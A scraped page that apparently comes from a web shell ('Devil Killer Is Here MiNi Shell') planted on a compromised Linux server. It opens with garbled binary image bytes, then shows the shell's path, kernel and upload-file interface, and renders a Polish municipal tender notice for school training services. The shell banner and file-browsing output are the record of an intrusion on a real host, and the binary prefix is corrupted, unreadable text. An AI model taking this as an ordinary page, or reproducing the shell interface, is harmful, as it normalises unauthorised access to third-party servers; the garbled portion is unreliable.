JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250120/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250120/0004981701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi polegające na realizacji usług szkoleniowych, doradczych oraz specjalistycznych, edukacyjno-społecznych w szkołach podstawowych Gminy Stężyca </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Stężyca</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Gmina Stężyca</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191675037</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Parkowa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Stężyca</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">83-322</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">58 882-89-40</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">stezyca@gminastezyca.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.gminastezyca.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi polegające na realizacji usług szkoleniowych, doradczych oraz specjalistycznych, edukacyjno-społecznych w szkołach podstawowych Gminy Stężyca </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6d5675dc-5c2e-43d5-9e7b-8da607b505fc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00049817</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-01-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00664587/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.5 Organizacja zajęć i warsztatów dla uczniów szkół podstawowych Gminy Stężyca - edukacja ogólna</p> <p class="mb-0">1.3.10 Organizacja szkoleń i warsztatów dla rodziców uczniów szkół podstawowych Gminy Stężyca - edukacja ogólna</p> <p class="mb-0">1.3.11 Organizacja szkoleń dla nauczycieli w szkołach podstawowych Gminy Stężyca - edukacja ogólna</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „INNOWACYJNA SZKOŁA – edukacja STEAM w Gminie Stężyca”, Działanie 5.8 Edukacja ogólna i zawodowa, współfinansowanego z Europejskiego Funduszu Społecznego Plus, Program Fundusze Europejskie dla Pomorza 2021-2027 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/gminastezyca/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/gminastezyca/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Niezbędne wymagania sprzętowo -<br/>aplikacyjne umożliwiające pracę na platformazakupowa.pl:<br/>*stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>*komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza<br/>wersja,jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>*zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>*włączona obsługa JavaScript,<br/>*zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh: mm: ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar. Wykonawca, przystępując do niniejszego postępowania o<br/>udzielenie zamówienia publicznego:<br/>*akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod<br/>linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>*zapoznał i stosuje się do Instrukcji składania ofert dostępnej pod linkiem.<br/>Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z platformazakupowa.pl.<br/>Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na<br/>stronie internetowej pod adresem: https: //platformazakupowa.pl/strona/45-instrukcje<br/>Formaty plików powinny być zgodne z “ROZPORZĄDZENIEM PREZESA RADY MINISTRÓW z dnia 21 maja 2024 r. w sprawie<br/>Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej<br/>oraz minimalnych wymagań dla systemów teleinformatycznych”.<br/>Zamawiający rekomenduje:<br/>*wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg) ze szczególnym wskazaniem na .pdf<br/>*W celu ewentualnej kompresji danych wykorzystanie jednego z formatów: .zip, .7Z<br/>*Wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. Dokumenty<br/>złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>*Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, max 10MB, oraz na ograniczenie<br/>wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, max 5MB.<br/>*Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, Zamawiający zaleca, w miarę<br/>możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES.<br/>*Pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. Wykonawca powinien pamiętać, aby plik z<br/>podpisem przekazywać łącznie z dokumentem podpisywanym.<br/>*aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju. Podpisywanie różnymi rodzajami<br/>podpisów np. osobistym i kwalifikowanym może doprowadzić do problemów w weryfikacji plików.<br/>*aby Wykonawca z odpowiednim wyprzedzeniem przetestował możliwość prawidłowego wykorzystania wybranej metody podpisania<br/>plików oferty.<br/>*aby komunikacja z Wykonawcami odbywała się tylko na Platformie za pośrednictwem formularza “Wyślij wiadomość do<br/>Zamawiającego”, nie za pośrednictwem adresu email.<br/>*Ofertę należy przygotować z należytą starannością i zachowaniem odpowiedniego odstępu czasu do zakończenia przyjmowania<br/>ofert. Sugerujemy złożenie oferty na 24 godziny przed terminem składania ofert.<br/>*Podczas podpisywania plików stosowanie algorytmu skrótu SHA2 zamiast SHA1.<br/>*Jeśli Wykonawca pakuje dokumenty np. w plik ZIP wcześniejsze podpisanie każdego ze skompresowanych plików.<br/>*wykorzystanie podpisu z kwalifikowanym znacznikiem czasu.<br/>*aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich podpisem kwalifikowanym. Może to skutkować naruszeniem.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem Państwa danych osobowych jest Gmina Stężyca. Kontakt pod adresem:<br/>Urząd Gminy w Stężycy, ul. Parkowa 1, 83-322 Stężyca, nr tel. 58 882 89 40, 58 882 89 73, mail: stezyca@gminastezyca.pl<br/>2. Administrator wyznaczył Inspektora ochrony danych osobowych. Mogą się Państwo z nim kontaktować w sprawach dotyczących<br/>przetwarzania danych osobowych oraz korzystania z praw z tym związanych. Kontakt pod adresem e- mail: inspektor@cbi24.pl.<br/>3. Państwa dane będą przetwarzane w celu przeprowadzenia procedury postępowania o udzielenie zamówienia publicznego<br/>współfinansowanego ze środków Europejskiego Funduszu Społecznego Plus w ramach Programu Fundusze Europejskie dla<br/>Pomorza 2021-2027. na podstawie na podstawie art. 6 ust. 1 lit. c RODO (tj. obowiązek wynikający z obowiązków Administratora) w<br/>związku z art. 275 ust. 2 ustawy Pzp.<br/>4. Państwa dane pozyskane w związku z postępowaniem o udzielenie zamówienia publicznego przechowywane będą zgodnie z<br/>zachowaniem zasad trwałości, aż do czasu wypełnienia obowiązku archiwizacji dokumentów projektowych.<br/>5. Odbiorcami Państwa danych osobowych będą wszystkie zainteresowane podmioty i osoby, gdyż co do zasady postępowanie o<br/>udzielenie zamówienia publicznego jest jawne. W szczególnych przypadkach, jeśli jest to uzasadnione ochroną prywatności zgodnie<br/>z art. 18 ust 5 pkt 1 i 2 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych dostęp do danych zostanie ograniczony.<br/>Ponadto odbiorcą danych mogą być podmioty z którymi Administrator zawarł umowy na korzystanie z udostępnianych przez nie<br/>systemów informatycznych w zakresie elektronicznego zarządzania dokumentacją wyłącznie w związku ze świadczeniem usług<br/>wsparcia technicznego i usuwaniem awarii. Odbiorców tych obowiązuje klauzula zachowania poufności pozyskanych w takich<br/>okolicznościach wszelkich danych, w tym danych osobowych.<br/>6. Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia korzystania ze środków ochrony<br/>prawnej, o których mowa w dziale IX, do upływu terminu na ich wniesienie.<br/>7. Dane osobowe będą przekazywane na Instytucji Zarządzającej tj. Zarządowi Województwa Pomorskiego z siedzibą w Gdańsku,<br/>80-810 ul. Okopowa 21/27.<br/>8. W odniesieniu do danych pozyskanych w związku z prowadzonym postępowaniem o udzielenie zamówienia publicznego<br/>przysługują Państwu następujące uprawnienia:<br/>a. prawo dostępu do swoich danych oraz otrzymania ich kopii;<br/>b. prawo do sprostowania (poprawiania) swoich danych;<br/>c. prawo do usunięcia danych osobowych, w sytuacji, gdy przetwarzanie danych nie następuje w celu związanym z<br/>przeprowadzeniem postępowania publicznego;<br/>d. prawo do ograniczenia przetwarzania danych, przy czym przepisy odrębne mogą wyłączyć możliwość skorzystania z tego prawa,<br/>e. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych (adres: ul. Stawki 2, 00 – 193 Warszawa; tel. 22 860<br/>70 86).<br/>9. Podanie danych osobowych jest warunkiem koniecznym do wzięcia udziału w postępowaniu o udzielnie zamówienia publicznego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do<br/>sprostowania lub uzupełnienia, o którym mowa w pkt. 7, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.<br/>b. W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenia tego postępowania.<br/>c. W przypadku gdy wniesienie żądania ograniczenia przetwarzania, spowoduje ograniczenie przetwarzania danych osobowych<br/>zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie<br/>zamówienia Zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 RODO. d.<br/>Udostępnianie protokołu postępowania wraz z załącznikami ma zastosowanie do wszystkich danych osobowych, z wyjątkiem<br/>szczególnych kategorii danych, zebranych w toku postępowania o udzielenie zamówienia.<br/>e. W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez Zamawiającego, z uprawnienia dostępu do<br/>danych osobowych Zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na<br/>celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia.<br/>f. Skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia do sprostowania lub uzupełnienia danych<br/>osobowych, nie może naruszać integralności protokołu postępowania oraz jego załączników.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">271.20.2025/EFS</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I – zajęcia i warsztaty poza edukacją formalną dla uczniów – zajęcia komputerowe, zajęcia z kodowania i programowania, warsztaty matematyczne, warsztaty naukowo-techniczne, warsztaty przyrodnicze, warsztaty fizyczne, zajęcia z języka kaszubskiego, zajęcia żeglarskie, zajęcia z doradcą zawodowym, zajęcia z przedsiębiorczości, indywidualne zajęcia psychologiczne, indywidualne zajęcia logopedyczne, zajęcia z gimnastyki korekcyjnej, zajęcia z języka polskiego dla uczniów z doświadczeniem migracji.<br/>Szczegółowy opis przedmiotu zamówienia zawarty jest w szczegółowym opisie przedmiotu zamówienia stanowiącym Załącznik Nr A do SWZ. Niniejszy opis zawiera minimalne wymagania, które musi spełniać oferowany przedmiot zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85320000-8 - Usługi społeczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80000000-4 - Usługi edukacyjne i szkoleniowe</p> <p class="mb-0">80100000-5 - Usługi szkolnictwa podstawowego</p> <p class="mb-0">80340000-9 - Usługi edukacji specjalnej</p> <p class="mb-0">85142100-7 - Usługi fizjoterapii</p> <p class="mb-0">85121270-6 - Usługi psychiatryczne lub psychologiczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-03-01 do 2027-05-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert będzie przeprowadzona według poniższego algorytmu (wzoru):<br/>Kryterium nr 1 Cena[C] 60 % (max 60 pkt.)<br/>C – liczba punktów przyznanych ocenianej ofercie w kryterium cena, gdzie punkty wyliczane są wg wzoru:<br/>C=CMIN/CB x 0,60 x 100 pkt <br/>CMIN – najniższa cena spośród ofert niepodlegających odrzuceniu<br/> CB – cena oferty badanej<br/>Kryterium nr 2 S – klauzule społeczne [S] 40% (max. 40 pkt)<br/>S - liczba punktów przyznanych ocenianej ofercie w kryterium „klauzule społeczne” gdzie punkty wyliczane są wg następujących zasad:<br/>Wykonawca, który zatrudnia minimum 1 osobę należącą do co najmniej jednej z poniższych grup:<br/>1)	osoba z niepełnosprawnościami posiadająca orzeczenie o niepełnosprawności (wg ustawy z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych);<br/>2)	osoba bezrobotna w rozumieniu ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy.<br/>W ramach niniejszego kryterium Wykonawca uzyska maksymalnie 40 punktów. W przypadku braku możliwości weryfikacji podanych informacji – brak właściwego zaznaczenia - Zamawiający uzna klauzulę za niespełnioną i Wykonawca otrzyma 0 pkt. Zamawiający dokona weryfikacji spełniania powyższego kryterium na podstawie oświadczenia Wykonawcy, będącego integralną częścią Formularza Ofertowego. Zamawiający zastrzega sobie prawo do weryfikacji powyższego kryterium przez cały okres trwania realizacji zamówienia. <br/>Pozostałe warunki spełniania kryterium w zakresie zatrudnienia co najmniej 1 osoby z wyżej wymienionych grupy znajdują się w SWZ.<br/>Za ofertę najkorzystniejszą uznana zostanie oferta, która w sumie uzyska najwyższą liczbę punktów w określonych przez Zamawiającego kryteriach.<br/>PŁ = C + S <br/>gdzie <br/>PŁ - łączna liczba punktów<br/>C - liczba punktów w kryterium ceny<br/>S – klauzule społeczne <br/>4.	Liczba punktów jest liczona z dokładnością do dwóch miejsc po przecinku, zaokrągleń dokonuje się w ten sposób, że końcówki poniżej 0,005 pkt pomija się, a końcówki 0,005 pkt i wyższe zaokrągla się o 0,01 pkt. <br/>5.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym w ustawie Pzp, oraz w SWZ i zostanie oceniona jako najkorzystniejsza w oparciu o bilans ceny oraz kryterium jakościowego, odnoszącego się do przedmiotu zamówienia.<br/>6.	Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny oraz kryterium jakościowego oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z najniższą ceną, a jeżeli zostały złożone oferty o takiej samej cenie, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych. Oferty dodatkowe ocenia się według tych samych zasad.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">klauzule społeczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II – szkolenia skierowane do kadry szkół – szkolenie „Indywidualizacja pracy z uczniem”, szkolenie „Sztuczna Inteligencja, w tym Chat GPT w nauczaniu”, szkolenie „Praca z uczniem ze specjalnymi potrzebami”, szkolenie „ Praca z uczniem z doświadczeniem migracji”, szkolenie „Alternatywne metody komunikowania się”, szkolenie „Radzenie sobie ze stresem i techniki relaksacyjne”, szkolenie „Równość płci i przeciwdziałanie stereotypom, szczególnie stereotypom w nauczaniu” </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85320000-8 - Usługi społeczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80000000-4 - Usługi edukacyjne i szkoleniowe</p> <p 